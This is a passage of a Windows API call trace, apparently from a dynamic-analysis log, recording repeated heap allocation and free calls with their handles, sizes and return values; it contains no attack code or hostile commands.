hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82850 | out: hHeap=0x6a0000) returned 1 [0190.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70000 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827a0 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82ab8 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff98 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41978 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70208 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d419d0 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0190.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0190.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0190.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0190.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0190.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0190.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0190.753] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0190.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0190.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0190.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 